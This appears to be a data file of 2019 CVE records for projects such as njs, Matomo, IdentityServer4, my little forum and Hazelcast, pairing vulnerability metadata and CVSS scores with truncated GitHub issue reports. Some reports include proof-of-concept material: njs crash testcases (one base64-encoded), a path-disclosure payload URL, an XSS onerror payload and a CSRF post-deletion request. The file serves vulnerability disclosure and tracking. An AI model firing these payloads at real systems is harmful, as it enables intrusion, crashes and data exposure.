[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/162" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ng...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742", "versionEndExcluding": null, "versionEndIncluding": "0.3.1", "versionStartExcluding": null...
[ "787" ]
787
https://github.com/nginx/njs/issues/162
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
NJS version ``` changeset: 965:e0fdef4eb478 tag: tip user: Dmitry Volyntsev <xeioex@nginx.com> date: Thu May 16 15:20:31 2019 +0300 summary: Fixed uninitialized-memory-access in Object.defineProperties(). ``` JavaScript testcase: ```js var v0="@褀+Qh" while (((((((((((((v0)>>>v0....
heap-buffer-overflow in nxt_utf8_encode (nxt_utf8.c:32)
https://api.github.com/repos/nginx/njs/issues/162/comments
0
2019-05-20T08:18:34Z
2019-05-30T14:15:14Z
https://github.com/nginx/njs/issues/162
445,981,633
162
396
CVE-2019-12207
2019-05-20T14:29:00.773
njs through 0.3.1, used in NGINX, has a heap-based buffer over-read in nxt_utf8_decode in nxt/nxt_utf8.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/168" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ng...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742", "versionEndExcluding": null, "versionEndIncluding": "0.3.1", "versionStartExcluding": null...
[ "125" ]
125
https://github.com/nginx/njs/issues/168
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Testcase (in base64): ``` bmV3IFJlZ0V4cChuZXcgUmVnRXhwKFJlZ0V4cCgobmV3IE9iamVjdCgiADs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7GDtzOzskOzs7OzsiLCAobmV3IEVycm9yKG5ldyBFcnJvcihuZXcgRXJyb3IobmV3IEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKCgwLTApKSkpKSkpKSk8PTApKSswKSkpKQo= ``...
heap-buffer-overflow in nxt_utf8_decode nxt/nxt_utf8.c:72
https://api.github.com/repos/nginx/njs/issues/168/comments
4
2019-05-20T09:01:01Z
2019-06-20T12:24:14Z
https://github.com/nginx/njs/issues/168
446,000,306
168
397
CVE-2019-12208
2019-05-20T14:29:00.837
njs through 0.3.1, used in NGINX, has a heap-based buffer overflow in njs_function_native_call in njs/njs_function.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/163" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ng...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742", "versionEndExcluding": null, "versionEndIncluding": "0.3.1", "versionStartExcluding": null...
[ "787" ]
787
https://github.com/nginx/njs/issues/163
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
NJS version ``` changeset: 965:e0fdef4eb478 tag: tip user: Dmitry Volyntsev <xeioex@nginx.com> date: Thu May 16 15:20:31 2019 +0300 summary: Fixed uninitialized-memory-access in Object.defineProperties(). ``` JavaScript testcase: ```js var v0=Array() while(v0.includes(v0.u,(Obje...
heap-buffer-overflow in njs_function_native_call njs/njs_function.c:623
https://api.github.com/repos/nginx/njs/issues/163/comments
1
2019-05-20T08:30:18Z
2019-05-24T16:00:19Z
https://github.com/nginx/njs/issues/163
445,986,781
163
398
CVE-2019-12215
2019-05-20T16:29:01.320
A full path disclosure vulnerability was discovered in Matomo v3.9.1 where a user can trigger a particular error to discover the full path of Matomo on the disk, because lastError.file is used in plugins/CorePluginsAdmin/templates/safemode.twig. NOTE: the vendor disputes the significance of this issue, stating "avoid r...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matomo-org/matomo/issues/14464" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://git...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:matomo:matomo:3.9.1:*:*:*:*:*:*:*", "matchCriteriaId": "1D513660-D70D-492C-99F7-41D619E86E0A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "209" ]
209
https://github.com/matomo-org/matomo/issues/14464
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matomo-org", "matomo" ]
A full path disclosure vulnerability was discovered in Matomo (v3.9.1) where a user can trigger a particular error to discover the full path of Matomo on the disk. PAYLOAD http://example.com/index.php?date=2019-04-20%2C2019-05-19&forceView=1&viewDataTable=test&module=API&action=get&widget=1&disableLink=0&idSite=1&p...
Full Path Disclosure
https://api.github.com/repos/matomo-org/matomo/issues/14464/comments
8
2019-05-20T08:54:18Z
2019-05-20T19:17:31Z
https://github.com/matomo-org/matomo/issues/14464
445,997,300
14,464
399
CVE-2019-12250
2019-05-21T16:29:01.877
IdentityServer IdentityServer4 through 2.4 has stored XSS via the httpContext to the host/Extensions/RequestLoggerMiddleware.cs LogForErrorContext method, which can be triggered by viewing a log. NOTE: the software maintainer disputes that this is a vulnerability because the request logger is not part of IdentityServer...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/IdentityServer/IdentityServer4/issues/3279" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:identityserver:identityserver4:*:*:*:*:*:*:*:*", "matchCriteriaId": "845B6EA6-4FFC-482B-BE5A-AB589A7201CB", "versionEndExcluding": null, "versionEndIncluding": "2.4.0", "vers...
[ "79" ]
79
https://github.com/IdentityServer/IdentityServer4/issues/3279
[ "Exploit", "Third Party Advisory" ]
github.com
[ "IdentityServer", "IdentityServer4" ]
Hi, https://github.com/IdentityServer/IdentityServer4/blob/master/src/IdentityServer4/host/Extensions/RequestLoggerMiddleware.cs in the LogForErrorContext method the PARAM httpContext is not filtred, and can be injected with XSS payload onerror="alert(String.fromCharCode(88,83,83)) in which can be triggred from th...
XSS in the RequestLoggerMiddleware.cs
https://api.github.com/repos/DuendeArchive/IdentityServer4/issues/3279/comments
7
2019-05-21T07:00:37Z
2020-01-10T19:49:59Z
https://github.com/DuendeArchive/IdentityServer4/issues/3279
446,448,651
3,279
400
CVE-2019-12253
2019-05-21T17:29:00.387
my little forum before 2.4.20 allows CSRF to delete posts, as demonstrated by mode=posting&delete_posting.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ilosuna/mylittleforum/issues/468" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ilosuna/mylittleforum/releases...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mylittleforum:my_little_forum:*:*:*:*:*:*:*:*", "matchCriteriaId": "7BB0B8C0-6EAE-4757-AC92-F3A60E31A0FD", "versionEndExcluding": "2.4.20", "versionEndIncluding": null, "vers...
[ "352" ]
352
https://github.com/ilosuna/mylittleforum/issues/468
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ilosuna", "mylittleforum" ]
Application is vulnerable for CSRF as CSRF token is not sent when a delete posting request is triggered. There are two scenarios which I have observed in this request. 1. Delete request is a simple GET request :- GET /ASLI_mylittleforum/index.php?mode=posting&delete_posting=2&back=index&delete_posting_confirm=tr...
CSRF token not present in delete posting request in admin panel | Manage posting
https://api.github.com/repos/My-Little-Forum/mylittleforum/issues/468/comments
18
2019-05-06T07:10:31Z
2019-05-14T12:25:40Z
https://github.com/My-Little-Forum/mylittleforum/issues/468
440,567,145
468
401
CVE-2016-10750
2019-05-22T14:29:00.223
In Hazelcast before 3.11, the cluster join procedure is vulnerable to remote code execution via Java deserialization. If an attacker can reach a listening Hazelcast instance with a crafted JoinRequest, and vulnerable classes exist in the classpath, the attacker can run arbitrary code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2019:2413" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hazelcast/hazelcast/issues/8024" }, { "source": "cv...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hazelcast:hazelcast:*:*:*:*:*:*:*:*", "matchCriteriaId": "5D207CCB-8DD3-4DB8-87B9-7766D37E98E3", "versionEndExcluding": "3.11", "versionEndIncluding": null, "versionStartExcl...
[ "502" ]
502
https://github.com/hazelcast/hazelcast/issues/8024
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hazelcast", "hazelcast" ]
I emailed the support address on April 17 and received a response indicating that I should report my findings here. So here we are. The Hazelcast cluster join procedure is vulnerable to remote code execution due to Java deserialization. If an attacker can reach a listening Hazelcast instance with a crafted `JoinReque...
Hazelcast is vulnerable to untrusted deserialization remote code execution
https://api.github.com/repos/hazelcast/hazelcast/issues/8024/comments
10
2016-04-26T20:29:27Z
2019-10-10T07:50:16Z
https://github.com/hazelcast/hazelcast/issues/8024
151,231,465
8,024
402
CVE-2019-12298
2019-05-23T14:29:07.813
Leanify 0.4.3 allows remote attackers to trigger an out-of-bounds write (1024 bytes) via a modified input file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/JayXon/Leanify/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/JayXon/Leanify/issues/50" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:leanify_project:leanify:0.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "08AC077C-4E5F-49EB-8429-B16451564D34", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "787" ]
787
https://github.com/JayXon/Leanify/issues/50
[ "Third Party Advisory" ]
github.com
[ "JayXon", "Leanify" ]
I found Leanify while doing some research and decided to use Radamsa to test the robustness of the application. It appears pretty solid. I grabbed a ton of test files and then ran this simple loop to generate some more files; for i in $(ls); do cat $i | radamsa; done. I did note a few things that were interesting, t...
Fuzzing: Specially crafted input file results in repeatable crash when compiled with ASAN under Ubuntu/GCC. Allows for limited, controlled OOB read.
https://api.github.com/repos/JayXon/Leanify/issues/50/comments
5
2019-05-20T17:43:12Z
2019-05-23T23:09:46Z
https://github.com/JayXon/Leanify/issues/50
446,234,789
50
403
CVE-2019-12395
2019-05-28T13:29:00.490
In Webbukkit Dynmap 3.0-beta-3 or below, due to a missing login check in servlet/MapStorageHandler.java, an attacker can see a map image without login even if victim enables login-required in setting.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://jvn.jp/en/jp/JVN89046645/index.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/webbukkit/dynmap/commit/641f142cd3ccdcbfb...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dynmap_project:dynmap:*:*:*:*:*:*:*:*", "matchCriteriaId": "10C67B48-312F-4A2C-9FC8-174028401A86", "versionEndExcluding": "3.0", "versionEndIncluding": null, "versionStartExc...
[ "287" ]
287
https://github.com/webbukkit/dynmap/issues/2474
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "webbukkit", "dynmap" ]
<!-- Thank you for filing a bug report. Please make sure to fill out the required information specified in the template. --> <!-- Do not delete the template, it contains required information and prevents your issues from being seen as an already logged bug. --> <!-- Also be sure to include a appropriate title for you...
Required login bypass vulnerability
https://api.github.com/repos/webbukkit/dynmap/issues/2474/comments
8
2019-05-02T08:18:24Z
2019-10-02T01:11:35Z
https://github.com/webbukkit/dynmap/issues/2474
439,473,547
2,474
405
CVE-2019-12439
2019-05-29T15:29:00.377
bubblewrap.c in Bubblewrap before 0.3.3 misuses temporary directories in /tmp as a mount point. In some particular configurations (related to XDG_RUNTIME_DIR), a local attacker may abuse this flaw to prevent other users from executing bubblewrap or potentially execute code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00028.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00015.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectatomic:bubblewrap:*:*:*:*:*:*:*:*", "matchCriteriaId": "D39BE3CC-42B1-4008-A900-798FA1445831", "versionEndExcluding": "0.3.3", "versionEndIncluding": null, "versionSta...
[ "20" ]
20
https://github.com/projectatomic/bubblewrap/issues/304
[ "Third Party Advisory" ]
github.com
[ "projectatomic", "bubblewrap" ]
@jwilk reported this Debian bug ([#923557](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=923557)): > [If] /run/user/\<UID\>/.bubblewrap/ doesn't exist and couldn't be created > (as was the case on my system), bubblewrap falls back to > /tmp/.bubblewrap-\<UID\>/. Local attacker could exploit this to prevent >...
potentially insecure use of /tmp
https://api.github.com/repos/containers/bubblewrap/issues/304/comments
9
2019-03-02T11:29:02Z
2019-05-29T16:58:52Z
https://github.com/containers/bubblewrap/issues/304
416,387,886
304
406
CVE-2019-12452
2019-05-29T19:29:00.580
types/types.go in Containous Traefik 1.7.x through 1.7.11, when the --api flag is used and the API is publicly reachable and exposed without sufficient access control (which is contrary to the API documentation), allows remote authenticated users to discover password hashes by reading the Basic HTTP Authentication or D...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "PARTIAL"...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://docs.traefik.io/configuration/api/#security" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/containous/traefik...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*", "matchCriteriaId": "6C4D325D-3CB4-480F-97F0-3B0DFF21172F", "versionEndExcluding": null, "versionEndIncluding": "1.7.11", "versionStartExclud...
[ "522" ]
522
https://github.com/containous/traefik/issues/4917
[ "Exploit", "Third Party Advisory" ]
github.com
[ "containous", "traefik" ]
### Do you want to request a *feature* or report a *bug*? Bug ### Did you try using a 1.7.x configuration for the version 2.0? - [ ] Yes - [x] No ### What did you do? - Enabled Traefik API, creating a frontend protected with a user / password (see reproduction case below) - Fetched the API ### What ...
Authentication hashes are available through the API
https://api.github.com/repos/traefik/traefik/issues/4917/comments
1
2019-05-29T14:19:49Z
2019-09-01T00:53:44Z
https://github.com/traefik/traefik/issues/4917
449,837,929
4,917
407
CVE-2019-12457
2019-05-30T14:29:01.970
FileRun 2019.05.21 allows images/extjs Directory Listing. This issue has been fixed in FileRun 2019.06.01.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://emreovunc.com/blog/en/FileRun-DirectoryListing-1.png" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://filerun.com/ch...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:afian:filerun:*:*:*:*:*:*:*:*", "matchCriteriaId": "7A03DAC2-0689-4E23-8ADD-B65DD6F7374F", "versionEndExcluding": "2019.06.01", "versionEndIncluding": null, "versionStartExcl...
[ "22" ]
22
https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3
[ "Third Party Advisory" ]
github.com
[ "EmreOvunc", "FileRun-Vulnerabilities" ]
The now available FileRun update (2019.06.01) fixes the reported issues. The update can be installed from the FileRun control panel: https://docs.filerun.com/updating Great work with your findings! Kindly drop us a quick message if you find anything else in the future, to give the many users of our software a chance...
Remediation
https://api.github.com/repos/EmreOvunc/FileRun-Vulnerabilities/issues/3/comments
0
2019-07-01T18:36:51Z
2020-01-09T19:21:11Z
https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3
462,853,557
3
408